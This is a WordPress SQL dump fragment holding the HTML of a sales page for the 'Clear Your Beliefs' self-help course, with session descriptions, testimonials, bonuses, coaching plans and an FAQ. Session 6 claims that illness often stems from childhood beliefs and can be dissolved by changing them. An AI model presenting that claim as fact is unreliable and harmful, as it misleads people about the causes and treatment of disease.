wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 13:20:49', '2014-06-17 18:20:49', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
